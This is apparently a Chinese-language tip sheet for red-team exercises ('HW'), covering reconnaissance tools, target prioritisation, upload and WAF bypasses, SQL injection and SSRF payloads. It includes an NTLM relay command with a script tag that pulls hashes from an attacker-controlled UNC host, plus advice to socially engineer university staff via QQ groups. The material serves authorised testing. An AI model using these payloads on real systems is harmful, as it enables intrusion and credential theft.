hw小技巧
字数 1967 2025-08-20 18:17:53
HW渗透测试实战技巧与经验总结
一、信息收集方法论
1.1 资源扩展技巧
- 单位名称利用:在FOFA等平台搜索
title="单位名称" - 域名扩展:推荐工具:
- 挖掘机
- subDomainsBrute.py
- IP处理:
- 外网扫描:masscan
- 内网扫描:nbtscan
1.2 目标分析工具
- Wappalyzer:识别网站框架技术栈
- Shodan:端口探测与漏洞发现
- 敏感文件探测:
- phpinfo.php
- robots.txt
- 在线检测平台:https://scan.top15.cn/web/infoleak
1.3 高级收集技巧
- 测试域传输漏洞
- 后台手动探测路径:
/admin,/login,/manager,或根据公司名称推测 - 特殊文件利用:
- .git文件:可恢复源代码
- .DS_Store:可用Python EXP利用
- .svn文件
- .swp文件:使用
vim -r恢复
二、目标选择策略
2.1 目标优先级排序
-
高校系统:
- 资源丰富(OA、教务、广播、新闻系统)
- 防御相对薄弱
- 社工容易(通过QQ群获取学号等信息)
-
中等优先级:
- 化工/交通/能源行业
- 论坛系统
- 各类企业系统
-
低优先级:
- 医院系统(HIS系统风险高)
- 银行系统
- 电信运营商系统
三、攻击路径与得分技巧
3.1 高效得分方法
-
框架漏洞利用:
- ThinkPHP、Joomla等已知EXP
- Java框架特别关注:
- Struts2
- JBoss反序列化
- Shiro反序列化
-
弱口令攻击:
- 常用组合:admin/admin, admin/123456等
- 特殊技巧:注册账号时使用
admin[多个空格]可能绕过验证
-
文件上传绕过:
- 黑名单绕过:
- 修改后缀为csproj后包含
- 使用phtml等假后缀
- 白名单绕过:
- 利用环境变量(如将dll改为php后转换)
- 修改Content-Type为
application/vnd.php.serialized
- 黑名单绕过:
-
未授权访问:
- Redis
- MongoDB
- 各类内网系统
-
SQL注入高级技巧:
- 使用
?x=1-if(user() like 'x%25',0,1)等Payload - GET改POST注入
- 添加X-Forward: 127.0.0.1可能绕过过滤
- 构造白名单词汇绕过WAF
- 垃圾数据注入(POST型放参数后,GET型转POST)
- 使用
3.2 其他漏洞利用
- XSS钓鱼:需要时间但有效
- XXE/SSRF/CSRF:遇到即利用
- SWF文件:可构造XSS Payload
- NTLM中继:利用XSS获取NTLM
python ntlmrelayx.py -tf targets.txt -c hostname > ~/smbrelay.txt <script src="\\\\10.0.0.7\\smbrelay">
四、HW实战技巧
4.1 报告提交策略
-
资源共享时:
- 发现漏洞先提交空报告占位
- 后续补充完整内容
- 防止他人抢先提交相同漏洞
-
资源未共享时:
- 提交完整渗透链报告
- 从外网打点到内网横向移动
4.2 特殊绕过技巧
-
路径绕过:
/urltest/./info/secret.jsp/urltest/;xinxin/info/secret.jsp/urltest/xinxin/../info/secret.jsp
-
SSRF绕过:
- IP转八进制(可加0-3个前导0)
- 去掉
https://的// - 重定向技巧:
(@可替换为#或?)<a href="https://www.baidu.com@127.0.0.1">
-
Cookie/Session操作:
- 修改参数可能实现任意用户浏览
- 同源策略下设置
document.cookie共享
-
命令执行探测:
- 测试
command=cat+/etc/version - 观察URL中
action=等参数,尝试路径遍历
- 测试
五、工具推荐清单
-
信息收集:
- FOFA/Shodan
- 挖掘机/subDomainsBrute.py
- masscan/nbtscan
-
目录扫描:
- dirsearch.py
- 御剑
-
后台发现:
- test404轻量级后台扫描器
-
被动扫描:
- xray(曾发现3个注入)
-
浏览器插件:
- Wappalyzer
- Shodan
六、防御规避经验
-
WAF绕过:
- 改变请求方式(GET转POST)
- 添加垃圾数据
- 使用白名单词汇
- 修改HTTP头(如X-Forward)
-
权限提升:
- 后台修改密码时替换refer和管理员账号
- 利用逻辑漏洞提升权限
-
静态防御绕过:
- 对于静态登录页面,利用同源策略设置cookie
- 尝试添加端口号(如:80)绕过访问限制
七、实战注意事项
-
目标确认:
- 避免"打偏"(攻击错误目标)
- 多次验证目标归属
-
时间管理:
- 优先处理易得分的漏洞
- 合理分配时间给不同目标
-
团队协作:
- 及时共享有效Payload
- 分工明确(信息收集、漏洞验证、报告撰写)
本总结基于2020年HW实战经验,部分技术可能需要根据当前环境调整。请务必在合法授权范围内使用这些技术。